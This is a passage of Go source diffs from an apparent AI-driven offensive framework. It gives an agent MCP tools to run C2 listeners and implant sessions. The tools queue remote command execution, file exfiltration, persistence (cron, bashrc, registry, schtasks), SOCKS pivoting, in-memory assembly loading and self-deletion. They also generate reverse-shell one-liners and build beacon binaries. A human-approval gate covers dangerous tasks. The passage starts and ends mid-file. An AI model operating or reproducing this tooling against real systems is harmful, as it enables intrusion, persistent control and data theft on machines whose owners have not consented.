timer := time.NewTimer(b.timeout)
defer timer.Stop()
deadline = timer.C
}
for {
select {
case <-ctx.Done():
_, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject',
decision_comment='context cancelled', decided_at=? WHERE id=? AND status='pending'`,
time.Now(), interruptID)
return ctx.Err()
case <-deadline:
_, _ = b.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='reject',
decision_comment='C2 HITL timeout auto-reject for safety', decided_at=? WHERE id=? AND status='pending'`,
time.Now(), interruptID)
b.logger.Warn("C2 HITL: 审批超时,安全起见拒绝执行", zap.String("interrupt_id", interruptID))
return fmt.Errorf("C2 HITL 审批超时,危险任务已被自动拒绝")
case <-ticker.C:
var status, decision string
err := b.db.QueryRow(`SELECT status, COALESCE(decision, '') FROM hitl_interrupts WHERE id = ?`,
interruptID).Scan(&status, &decision)
if err != nil {
if err == sql.ErrNoRows {
return nil
}
continue
}
switch status {
case "decided", "timeout":
if decision == "reject" {
return fmt.Errorf("C2 危险任务被人工拒绝")
}
return nil
case "cancelled":
return fmt.Errorf("C2 审批已取消")
case "pending":
continue
default:
continue
}
}
}
}
// C2HooksConfig 配置 C2 Manager 的 Hooks
type C2HooksConfig struct {
DB *database.DB
Logger *zap.Logger
AttackChainRecord func(session *database.C2Session, phase string, description string)
VulnRecord func(session *database.C2Session, title string, severity string)
}
// SetupC2Hooks 设置 C2 Manager 的业务钩子
func SetupC2Hooks(cfg *C2HooksConfig) c2.Hooks {
return c2.Hooks{
OnSessionFirstSeen: func(session *database.C2Session) {
// 新会话上线
cfg.Logger.Info("C2 Session first seen",
zap.String("session_id", session.ID),
zap.String("hostname", session.Hostname),
zap.String("os", session.OS),
zap.String("arch", session.Arch),
)
// 记录漏洞(初始访问点)
if cfg.VulnRecord != nil {
cfg.VulnRecord(session, fmt.Sprintf("C2 Session Established: %s@%s", session.Username, session.Hostname), "high")
}
// 记录攻击链(Initial Access
if cfg.AttackChainRecord != nil {
cfg.AttackChainRecord(session, "initial-access", fmt.Sprintf("Implant beacon from %s/%s", session.Hostname, session.InternalIP))
}
},
OnTaskCompleted: func(task *database.C2Task, sessionID string) {
// 任务完成
cfg.Logger.Debug("C2 Task completed",
zap.String("task_id", task.ID),
zap.String("task_type", task.TaskType),
zap.String("status", task.Status),
)
// 根据任务类型记录攻击链
if cfg.AttackChainRecord != nil {
session, _ := cfg.DB.GetC2Session(sessionID)
if session != nil {
phase := taskToAttackPhase(task.TaskType)
if phase != "" {
cfg.AttackChainRecord(session, phase, fmt.Sprintf("Task %s: %s", task.TaskType, task.Status))
}
}
}
},
}
}
// taskToAttackPhase 将任务类型映射到 ATT&CK 阶段
func taskToAttackPhase(taskType string) string {
switch taskType {
case "exec", "shell":
return "execution"
case "upload":
return "persistence"
case "download":
return "exfiltration"
case "screenshot":
return "collection"
case "kill_proc":
return "impact"
case "port_fwd", "socks_start":
return "lateral-movement"
case "load_assembly":
return "defense-evasion"
case "persist":
return "persistence"
case "self_delete":
return "defense-evasion"
default:
return "execution"
}
}
// SetupC2HITLBridgeWithAgent 设置 HITL 桥接器
// 这个函数将由 App 调用,注入必要的依赖
func SetupC2HITLBridgeWithAgent(db *database.DB, logger *zap.Logger) c2.HITLBridge {
return &C2HITLBridge{
db: db,
logger: logger,
timeout: 5 * time.Minute,
getConvID: func() string { return "" },
}
}
+104
View File
@@ -0,0 +1,104 @@
package app
import (
"context"
"cyberstrike-ai/internal/c2"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/handler"
"go.uber.org/zap"
)
// setupC2Runtime 创建 C2 Manager、看门狗与取消函数;不注册 MCP 工具(由 Apply 统一 ClearTools 后注册)。
func setupC2Runtime(
cfg *config.Config,
db *database.DB,
agentHandler *handler.AgentHandler,
logger *zap.Logger,
) (*c2.Manager, *c2.SessionWatchdog, context.CancelFunc) {
if !cfg.C2.EnabledEffective() {
return nil, nil, nil
}
c2Manager := c2.NewManager(db, logger, "tmp/c2")
c2Manager.Registry().Register(string(c2.ListenerTypeTCPReverse), c2.NewTCPReverseListener)
c2Manager.Registry().Register(string(c2.ListenerTypeHTTPBeacon), c2.NewHTTPBeaconListener)
c2Manager.Registry().Register(string(c2.ListenerTypeHTTPSBeacon), c2.NewHTTPSBeaconListener)
c2Manager.Registry().Register(string(c2.ListenerTypeWebSocket), c2.NewWebSocketListener)
c2HITLBridge := NewC2HITLBridge(db, logger)
c2Manager.SetHITLBridge(c2HITLBridge)
c2Manager.SetHITLDangerousGate(func(conversationID, toolName string) bool {
return agentHandler.HITLNeedsToolApproval(conversationID, toolName)
})
c2Hooks := SetupC2Hooks(&C2HooksConfig{
DB: db,
Logger: logger,
AttackChainRecord: func(session *database.C2Session, phase string, description string) {
logger.Info("C2 Attack Chain",
zap.String("session_id", session.ID),
zap.String("phase", phase),
zap.String("desc", description),
)
},
VulnRecord: func(session *database.C2Session, title string, severity string) {
logger.Info("C2 Vulnerability",
zap.String("session_id", session.ID),
zap.String("title", title),
zap.String("severity", severity),
)
},
})
c2Manager.SetHooks(c2Hooks)
c2Manager.RestoreRunningListeners()
c2Watchdog := c2.NewSessionWatchdog(c2Manager)
watchdogCtx, watchdogCancel := context.WithCancel(context.Background())
go c2Watchdog.Run(watchdogCtx)
return c2Manager, c2Watchdog, watchdogCancel
}
// ReconcileC2AfterConfigApply 根据当前内存配置启停 C2(不写盘;在 Apply 中 ClearTools 之前调用)。
func (a *App) ReconcileC2AfterConfigApply() error {
if !a.config.C2.EnabledEffective() {
a.shutdownC2()
return nil
}
if a.c2Manager != nil {
return nil
}
if a.db == nil || a.agentHandler == nil {
return nil
}
m, wd, cancel := setupC2Runtime(a.config, a.db, a.agentHandler, a.logger.Logger)
if m == nil {
return nil
}
a.c2Manager = m
a.c2Watchdog = wd
a.c2WatchdogCancel = cancel
if a.c2Handler != nil {
a.c2Handler.SetManager(m)
}
a.logger.Info("C2 子系统已按配置启动")
return nil
}
// shutdownC2 停止看门狗与所有监听器,并断开 Handler 引用。
func (a *App) shutdownC2() {
had := a.c2WatchdogCancel != nil || a.c2Manager != nil
if a.c2WatchdogCancel != nil {
a.c2WatchdogCancel()
a.c2WatchdogCancel = nil
}
a.c2Watchdog = nil
if a.c2Manager != nil {
a.c2Manager.Close()
a.c2Manager = nil
}
if a.c2Handler != nil {
a.c2Handler.SetManager(nil)
}
if had {
a.logger.Info("C2 子系统已关闭")
}
}
+861
View File
@@ -0,0 +1,861 @@
package app
import (
"context"
"encoding/json"
"fmt"
"strconv"
"strings"
"time"
"cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/c2"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin"
"github.com/google/uuid"
"go.uber.org/zap"
)
// registerC2Tools 注册所有 C2 MCP 工具(合并同类项,减少工具数量以节省上下文 token)。
// webListenPort 为本进程 Web/API 监听端口(配置 server.port,启动时已加载),用于 MCP 描述中提示勿与 C2 bind_port 冲突。
func registerC2Tools(mcpServer *mcp.Server, c2Manager *c2.Manager, logger *zap.Logger, webListenPort int) {
registerC2ListenerTool(mcpServer, c2Manager, logger, webListenPort)
registerC2SessionTool(mcpServer, c2Manager, logger)
registerC2TaskTool(mcpServer, c2Manager, logger)
registerC2TaskManageTool(mcpServer, c2Manager, logger)
registerC2PayloadTool(mcpServer, c2Manager, logger, webListenPort)
registerC2EventTool(mcpServer, c2Manager, logger)
registerC2ProfileTool(mcpServer, c2Manager, logger)
registerC2FileTool(mcpServer, c2Manager, logger)
logger.Info("C2 MCP tools registered (8 unified tools)")
}
func makeC2Result(data interface{}, err error) (*mcp.ToolResult, error) {
if err != nil {
return &mcp.ToolResult{
Content: []mcp.Content{{Type: "text", Text: err.Error()}},
IsError: true,
}, nil
}
text, _ := json.Marshal(data)
return &mcp.ToolResult{
Content: []mcp.Content{{Type: "text", Text: string(text)}},
}, nil
}
// ============================================================================
// c2_listener — 监听器统一工具
// ============================================================================
func registerC2ListenerTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Listener,
Description: fmt.Sprintf(`C2 监听器管理。通过 action 参数选择操作:
- list: 列出所有监听器
- get: 获取监听器详情(需 listener_id
- create: 创建监听器(需 name, type, bind_port)。成功时除 listener 外会返回 implant_token(仅此一次,用于 X-Implant-Token / onelinerlist/get/start 不再返回)
- update: 更新监听器配置(需 listener_id,可改 name/bind_host/bind_port/remark/config/callback_host
- start: 启动监听器(需 listener_id
- stop: 停止监听器(需 listener_id
- delete: 删除监听器(需 listener_id
监听器类型: tcp_reverse, http_beacon, https_beacon, websocket
端口约束:create/update 的 bind_port 禁止与本平台 Web/API 所用端口相同。当前本服务该端口为 %d(配置项 server.port,随进程启动从配置文件加载)。若 bind_port 与此相同会导致本服务或监听器 bind 失败、Beacon/oneliner 误连到 Web 而非 C2。请为监听器另选空闲端口。`, webListenPort),
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/start/stop/delete", "enum": []string{"list", "get", "create", "update", "start", "stop", "delete"}},
"listener_id": map[string]interface{}{"type": "string", "description": "监听器 IDget/update/start/stop/delete 需要)"},
"name": map[string]interface{}{"type": "string", "description": "监听器名称(create/update"},
"type": map[string]interface{}{"type": "string", "description": "监听器类型(create", "enum": []string{"tcp_reverse", "http_beacon", "https_beacon", "websocket"}},
"bind_host": map[string]interface{}{"type": "string", "description": "绑定地址,默认 127.0.0.1;外网监听常用 0.0.0.0"},
"callback_host": map[string]interface{}{"type": "string", "description": "可选:植入端/Payload 回连主机名(公网 IP 或域名)。写入 config_json;生成 oneliner/beacon 时优先于 bind_host。update 时传入空字符串可清除"},
"bind_port": map[string]interface{}{"type": "integer", "description": fmt.Sprintf("绑定端口(create 必填)。须 ≠ %d(当前本服务 Web/API 端口,配置 server.port", webListenPort), "minimum": 1, "maximum": 65535},
"profile_id": map[string]interface{}{"type": "string", "description": "Malleable Profile ID"},
"remark": map[string]interface{}{"type": "string", "description": "备注"},
"config": map[string]interface{}{"type": "object", "description": "高级配置(beacon 路径/TLS/OPSEC 等),create/update 可用"},
},
"required": []string{"action"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
action := getString(params, "action")
id := getString(params, "listener_id")
switch action {
case "list":
listeners, err := m.DB().ListC2Listeners()
if err != nil {
return makeC2Result(nil, err)
}
for _, li := range listeners {
li.EncryptionKey = ""
li.ImplantToken = ""
}
return makeC2Result(map[string]interface{}{"listeners": listeners, "count": len(listeners)}, nil)
case "get":
listener, err := m.DB().GetC2Listener(id)
if err != nil {
return makeC2Result(nil, err)
}
if listener == nil {
return makeC2Result(nil, fmt.Errorf("listener not found"))
}
listener.EncryptionKey = ""
listener.ImplantToken = ""
return makeC2Result(map[string]interface{}{"listener": listener}, nil)
case "create":
var cfg *c2.ListenerConfig
if cfgRaw, ok := params["config"]; ok && cfgRaw != nil {
cfgBytes, _ := json.Marshal(cfgRaw)
cfg = &c2.ListenerConfig{}
_ = json.Unmarshal(cfgBytes, cfg)
}
input := c2.CreateListenerInput{
Name: getString(params, "name"),
Type: getString(params, "type"),
BindHost: getString(params, "bind_host"),
BindPort: int(getFloat64(params, "bind_port")),
ProfileID: getString(params, "profile_id"),
Remark: getString(params, "remark"),
Config: cfg,
CallbackHost: getString(params, "callback_host"),
}
listener, err := m.CreateListener(input)
if err != nil {
return makeC2Result(nil, err)
}
implantToken := listener.ImplantToken
listener.EncryptionKey = ""
listener.ImplantToken = ""
return makeC2Result(map[string]interface{}{
"listener": listener,
"implant_token": implantToken,
}, nil)
case "update":
listener, err := m.DB().GetC2Listener(id)
if err != nil {
return makeC2Result(nil, err)
}
if listener == nil {
return makeC2Result(nil, fmt.Errorf("listener not found"))
}
if m.IsListenerRunning(id) {
newHost := getString(params, "bind_host")
newPort := int(getFloat64(params, "bind_port"))
if (newHost != "" && newHost != listener.BindHost) || (newPort > 0 && newPort != listener.BindPort) {
return makeC2Result(nil, fmt.Errorf("cannot modify bind address while listener is running"))
}
}
if v := getString(params, "name"); v != "" {
listener.Name = v
}
if v := getString(params, "bind_host"); v != "" {
listener.BindHost = v
}
if v := int(getFloat64(params, "bind_port")); v > 0 {
listener.BindPort = v
}
if v := getString(params, "profile_id"); v != "" {
listener.ProfileID = v
}
if v, ok := params["remark"]; ok {
listener.Remark, _ = v.(string)
}
if cfgRaw, ok := params["config"]; ok && cfgRaw != nil {
cfgBytes, _ := json.Marshal(cfgRaw)
listener.ConfigJSON = string(cfgBytes)
}
if _, ok := params["callback_host"]; ok {
pcfg := &c2.ListenerConfig{}
raw := strings.TrimSpace(listener.ConfigJSON)
if raw == "" {
raw = "{}"
}
_ = json.Unmarshal([]byte(raw), pcfg)
pcfg.CallbackHost = strings.TrimSpace(getString(params, "callback_host"))
pcfg.ApplyDefaults()
cfgBytes, err := json.Marshal(pcfg)
if err != nil {
return makeC2Result(nil, err)
}
listener.ConfigJSON = string(cfgBytes)
}
if err := m.DB().UpdateC2Listener(listener); err != nil {
return makeC2Result(nil, err)
}
listener.EncryptionKey = ""
listener.ImplantToken = ""
return makeC2Result(map[string]interface{}{"listener": listener}, nil)
case "start":
listener, err := m.StartListener(id)
if err != nil {
return makeC2Result(nil, err)
}
listener.EncryptionKey = ""
listener.ImplantToken = ""
return makeC2Result(map[string]interface{}{"listener": listener}, nil)
case "stop":
err := m.StopListener(id)
return makeC2Result(map[string]interface{}{"stopped": err == nil}, err)
case "delete":
err := m.DeleteListener(id)
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
}
})
}
// ============================================================================
// c2_session — 会话统一工具
// ============================================================================
func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Session,
Description: `C2 会话管理。通过 action 参数选择操作:
- list: 列出会话(可按 listener_id/status/os/search 过滤)
- get: 获取会话详情及最近任务历史(需 session_id
- set_sleep: 设置心跳间隔(需 session_id
- kill: 下发 exit 任务让 implant 退出(需 session_id
- delete: 删除会话记录(需 session_id`,
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete", "enum": []string{"list", "get", "set_sleep", "kill", "delete"}},
"session_id": map[string]interface{}{"type": "string", "description": "会话 IDget/set_sleep/kill/delete 需要)"},
"listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list"},
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killedlist"},
"os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwinlist"},
"search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IPlist"},
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list"},
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep"},
"jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100set_sleep"},
},
"required": []string{"action"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
action := getString(params, "action")
id := getString(params, "session_id")
switch action {
case "list":
filter := database.ListC2SessionsFilter{
ListenerID: getString(params, "listener_id"),
Status: getString(params, "status"),
OS: getString(params, "os"),
Search: getString(params, "search"),
}
if limit := int(getFloat64(params, "limit")); limit > 0 {
filter.Limit = limit
}
sessions, err := m.DB().ListC2Sessions(filter)
return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err)
case "get":
session, err := m.DB().GetC2Session(id)
if err != nil {
return makeC2Result(nil, err)
}
if session == nil {
return makeC2Result(nil, fmt.Errorf("session not found"))
}
tasks, _ := m.DB().ListC2Tasks(database.ListC2TasksFilter{SessionID: id, Limit: 10})
return makeC2Result(map[string]interface{}{"session": session, "tasks": tasks}, nil)
case "set_sleep":
sleep := int(getFloat64(params, "sleep_seconds"))
jitter := int(getFloat64(params, "jitter_percent"))
err := m.DB().SetC2SessionSleep(id, sleep, jitter)
return makeC2Result(map[string]interface{}{"updated": err == nil, "sleep_seconds": sleep, "jitter_percent": jitter}, err)
case "kill":
task, err := m.EnqueueTask(c2.EnqueueTaskInput{
SessionID: id,
TaskType: c2.TaskTypeExit,
Payload: map[string]interface{}{},
Source: "ai",
ConversationID: agent.ConversationIDFromContext(ctx),
UserCtx: ctx,
})
return makeC2Result(map[string]interface{}{"task": task}, err)
case "delete":
err := m.DB().DeleteC2Session(id)
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
}
})
}
// ============================================================================
// c2_task — 任务下发统一工具(合并所有 task 类型)
// ============================================================================
func registerC2TaskTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Task,
Description: `在 C2 会话上下发任务。所有任务类型通过 task_type 参数指定:
- exec: 执行命令(需 command
- shell: 交互式命令,保持 cwd(需 command
- pwd/ps/screenshot/socks_stop: 无额外参数
- cd/ls: 需 path
- kill_proc: 需 pid
- upload: 需 remote_path + file_id
- download: 需 remote_path
- port_fwd: 需 action(start/stop) + local_port + remote_host + remote_port
- socks_start: 需 port(默认 1080
- load_assembly: 需 data(base64) 或 file_id,可选 args
- persist: 可选 method(auto/cron/bashrc/launchagent/registry/schtasks)
返回 task_id,用 c2_task_manage 的 wait/get_result 获取结果。`,
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"session_id": map[string]interface{}{"type": "string", "description": "C2 会话 IDs_xxx"},
"task_type": map[string]interface{}{"type": "string", "description": "任务类型", "enum": []string{"exec", "shell", "pwd", "cd", "ls", "ps", "kill_proc", "upload", "download", "screenshot", "port_fwd", "socks_start", "socks_stop", "load_assembly", "persist"}},
"command": map[string]interface{}{"type": "string", "description": "命令(exec/shell"},
"path": map[string]interface{}{"type": "string", "description": "路径(cd/ls"},
"pid": map[string]interface{}{"type": "integer", "description": "进程 IDkill_proc"},
"remote_path": map[string]interface{}{"type": "string", "description": "远程路径(upload/download"},
"file_id": map[string]interface{}{"type": "string", "description": "服务端文件 IDupload/load_assembly"},
"data": map[string]interface{}{"type": "string", "description": "base64 数据(load_assembly"},
"args": map[string]interface{}{"type": "string", "description": "命令行参数(load_assembly"},
"action": map[string]interface{}{"type": "string", "description": "start/stopport_fwd"},
"local_port": map[string]interface{}{"type": "integer", "description": "本地端口(port_fwd"},
"remote_host": map[string]interface{}{"type": "string", "description": "远程主机(port_fwd"},
"remote_port": map[string]interface{}{"type": "integer", "description": "远程端口(port_fwd"},
"port": map[string]interface{}{"type": "integer", "description": "SOCKS5 端口(socks_start),默认 1080"},
"method": map[string]interface{}{"type": "string", "description": "持久化方法(persist: auto/cron/bashrc/launchagent/registry/schtasks"},
"timeout_seconds": map[string]interface{}{"type": "integer", "description": "超时秒数,默认 60"},
},
"required": []string{"session_id", "task_type"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
sessionID := getString(params, "session_id")
taskTypeStr := getString(params, "task_type")
taskType := c2.TaskType(taskTypeStr)
timeout := getFloat64(params, "timeout_seconds")
payload := map[string]interface{}{"timeout_seconds": timeout}
switch taskType {
case c2.TaskTypeExec, c2.TaskTypeShell:
payload["command"] = getString(params, "command")
case c2.TaskTypeCd, c2.TaskTypeLs:
payload["path"] = getString(params, "path")
case c2.TaskTypeKillProc:
payload["pid"] = params["pid"]
case c2.TaskTypeUpload:
payload["remote_path"] = getString(params, "remote_path")
payload["file_id"] = getString(params, "file_id")
case c2.TaskTypeDownload:
payload["remote_path"] = getString(params, "remote_path")
case c2.TaskTypePortFwd:
payload["action"] = getString(params, "action")
payload["local_port"] = params["local_port"]
payload["remote_host"] = getString(params, "remote_host")
payload["remote_port"] = params["remote_port"]
case c2.TaskTypeSocksStart:
payload["port"] = params["port"]
case c2.TaskTypeLoadAssembly:
payload["data"] = getString(params, "data")
payload["file_id"] = getString(params, "file_id")
payload["args"] = getString(params, "args")
case c2.TaskTypePersist:
payload["method"] = getString(params, "method")
case c2.TaskTypePwd, c2.TaskTypePs, c2.TaskTypeScreenshot, c2.TaskTypeSocksStop:
// no extra params
default:
return makeC2Result(nil, fmt.Errorf("unsupported task_type: %s", taskTypeStr))
}
input := c2.EnqueueTaskInput{
SessionID: sessionID,
TaskType: taskType,
Payload: payload,
Source: "ai",
ConversationID: agent.ConversationIDFromContext(ctx),
UserCtx: ctx,
}
task, err := m.EnqueueTask(input)
if err != nil {
return makeC2Result(nil, err)
}
return makeC2Result(map[string]interface{}{"task_id": task.ID, "status": task.Status}, nil)
})
}
// ============================================================================
// c2_task_manage — 任务管理工具(查询/等待/取消)
// ============================================================================
func registerC2TaskManageTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2TaskManage,
Description: `C2 任务管理。通过 action 参数选择操作:
- get_result: 获取任务详情和结果(需 task_id)
- wait: 阻塞等待任务完成并返回结果(需 task_id)
- list: 列出任务(可按 session_id/status 过滤)
- cancel: 取消排队中的任务(需 task_id)`,
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: get_result/wait/list/cancel", "enum": []string{"get_result", "wait", "list", "cancel"}},
"task_id": map[string]interface{}{"type": "string", "description": "任务 IDget_result/wait/cancel 需要)"},
"session_id": map[string]interface{}{"type": "string", "description": "按会话过滤(list"},
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: queued/sent/running/success/failed/cancelledlist"},
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list"},
"timeout_seconds": map[string]interface{}{"type": "integer", "description": "等待超时秒数(wait),默认 60"},
},
"required": []string{"action"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
action := getString(params, "action")
switch action {
case "get_result":
id := getString(params, "task_id")
task, err := m.DB().GetC2Task(id)
if err != nil {
return makeC2Result(nil, err)
}
if task == nil {
return makeC2Result(nil, fmt.Errorf("task not found"))
}
return makeC2Result(map[string]interface{}{"task": task}, nil)
case "wait":
id := getString(params, "task_id")
timeout := int(getFloat64(params, "timeout_seconds"))
if timeout <= 0 {
timeout = 60
}
deadline := time.Now().Add(time.Duration(timeout) * time.Second)
for time.Now().Before(deadline) {
task, err := m.DB().GetC2Task(id)
if err != nil {
return makeC2Result(nil, err)
}
if task == nil {
return makeC2Result(nil, fmt.Errorf("task not found"))
}
if task.Status == "success" || task.Status == "failed" || task.Status == "cancelled" {
return makeC2Result(map[string]interface{}{"task": task}, nil)
}
select {
case <-time.After(500 * time.Millisecond):
case <-ctx.Done():
return makeC2Result(nil, ctx.Err())
}
}
return makeC2Result(nil, fmt.Errorf("timeout waiting for task completion"))
case "list":
filter := database.ListC2TasksFilter{
SessionID: getString(params, "session_id"),
Status: getString(params, "status"),
}
if limit := int(getFloat64(params, "limit")); limit > 0 {
filter.Limit = limit
}
tasks, err := m.DB().ListC2Tasks(filter)
return makeC2Result(map[string]interface{}{"tasks": tasks, "count": len(tasks)}, err)
case "cancel":
id := getString(params, "task_id")
err := m.CancelTask(id)
return makeC2Result(map[string]interface{}{"cancelled": err == nil}, err)
default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
}
})
}
// ============================================================================
// c2_payload — Payload 统一工具
// ============================================================================
func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Payload,
Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作:
- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败:
• tcp_reverse:裸 TCP 反弹,可用 kind: bash, nc, nc_mkfifo, python, perl, powershellbash 指 /dev/tcp 类,不是 HTTP)。
• http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。
• 需要经典 bash 反弹 shell 时:先 c2_listener create type=tcp_reverse,再对该监听器用 kind=bash。
• 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。
- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reversetcp_reverse 下植入端回连后先发魔数 CSB1,再走与 HTTP 相同的 AES-GCM JSON 语义;未发魔数的连接仍按经典交互 shell 处理)。
依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort),
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"action": map[string]interface{}{"type": "string", "description": "操作: oneliner/build", "enum": []string{"oneliner", "build"}},
"listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(必填)。oneliner 前请确认该监听器的 type,再选兼容的 kind"},
"kind": map[string]interface{}{"type": "string", "description": "仅 action=oneliner 需要。tcp_reverse: bash|nc|nc_mkfifo|python|perl|powershellhttp_beacon|https_beacon|websocket: 仅 curl_beacon"},
"host": map[string]interface{}{"type": "string", "description": "oneliner/build 可选覆盖:非空则强制用作植入回连主机。留空时顺序为:监听器 callback_hostcreate/update 的 callback_host 参数写入)→ bind_host0.0.0.0 时尝试本机对外 IP 探测)"},
"os": map[string]interface{}{"type": "string", "description": "目标 OSbuild: linux/windows/darwin", "default": "linux"},
"arch": map[string]interface{}{"type": "string", "description": "目标架构(build: amd64/arm64/386/arm", "default": "amd64"},
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "默认心跳间隔(build"},
"jitter_percent": map[string]interface{}{"type": "integer", "description": "默认抖动百分比(build"},
},
"required": []string{"action", "listener_id"},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
action := getString(params, "action")
listenerID := getString(params, "listener_id")
switch action {
case "oneliner":
listener, err := m.DB().GetC2Listener(listenerID)
if err != nil {
return makeC2Result(nil, err)
}
if listener == nil {
return makeC2Result(nil, fmt.Errorf("listener not found"))
}
host := c2.ResolveBeaconDialHost(listener, getString(params, "host"), l, listenerID)
kind := c2.OnelinerKind(getString(params, "kind"))
if kind == "" {
compatible := c2.OnelinerKindsForListener(listener.Type)
if len(compatible) > 0 {
kind = compatible[0]
}
}
if !c2.IsOnelinerCompatible(listener.Type, kind) {
compatible := c2.OnelinerKindsForListener(listener.Type)
names := make([]string, len(compatible))
for i, k := range compatible {
names[i] = string(k)
}
return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names))
}
input := c2.OnelinerInput{
Kind: kind,
Host: host,
Port: listener.BindPort,
HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort),
ImplantToken: listener.ImplantToken,
}
oneliner, err := c2.GenerateOneliner(input)
if err != nil {
return makeC2Result(nil, err)
}
out := map[string]interface{}{
"oneliner": oneliner, "kind": input.Kind, "host": host, "port": listener.BindPort,
}
if kind == c2.OnelinerCurl {
out["usage_note"] = "同步 exec/execute:整段原样执行(末尾须有「 &」)。去掉则 while 永不结束,工具会一直卡住。"
}
return makeC2Result(out, nil)
case "build":
builder := c2.NewPayloadBuilder(m, l, "", "")
input := c2.PayloadBuilderInput{
ListenerID: listenerID,
OS: getString(params, "os"),
Arch: getString(params, "arch"),
SleepSeconds: int(getFloat64(params, "sleep_seconds")),
JitterPercent: int(getFloat64(params, "jitter_percent")),
Host: strings.TrimSpace(getString(params, "host")),
}
result, err := builder.BuildBeacon(input)
if err != nil {
return makeC2Result(nil, err)
}
return makeC2Result(map[string]interface{}{
"payload_id": result.PayloadID, "download_path": result.DownloadPath,
"os": result.OS, "arch": result.Arch, "size_bytes": result.SizeBytes,
}, nil)
default:
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
}
})
}
// ============================================================================
// c2_event — 事件查询工具
// ============================================================================
func registerC2EventTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
s.RegisterTool(mcp.Tool{
Name: builtin.ToolC2Event,
Description: "获取 C2 事件(上线/掉线/任务/错误),支持按级别/类别/会话/任务/时间过滤",
InputSchema: map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"level": map[string]interface{}{"type": "string", "description": "级别过滤: info/warn/critical"},
"category": map[string]interface{}{"type": "string", "description": "类别过滤: listener/session/task/payload/opsec"},
"session_id": map[string]interface{}{"type": "string", "description": "按会话过滤"},
"task_id": map[string]interface{}{"type": "string", "description": "按任务过滤"},
"since": map[string]interface{}{"type": "string", "description": "起始时间(RFC3339 格式,如 2025-01-01T00:00:00Z"},
"limit": map[string]interface{}{"type": "integer", "default": 50, "description": "返回数量"},
},
},
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
filter := database.ListC2EventsFilter{
Level: getString(params, "level"),
Category: getString(params, "category"),
SessionID: getString(params, "session_id"),
TaskID: getString(params, "task_id"),
Limit: int(getFloat64(params, "limit")),
}
if filter.Limit <= 0 {
filter.Limit = 50
}
if since := getString(params, "since"); since != "" {
if t, err := time.Parse(time.RFC3339, since); err == nil {
filter.Since = &t
}
}
events, err := m.DB().ListC2Events(filter)
return makeC2Result(map[string]interface{}{"events": events, "count": len(events)}, err)
})
}
// ============================================================================
// c2_profile — Malleable Profile 管理工具(新增)
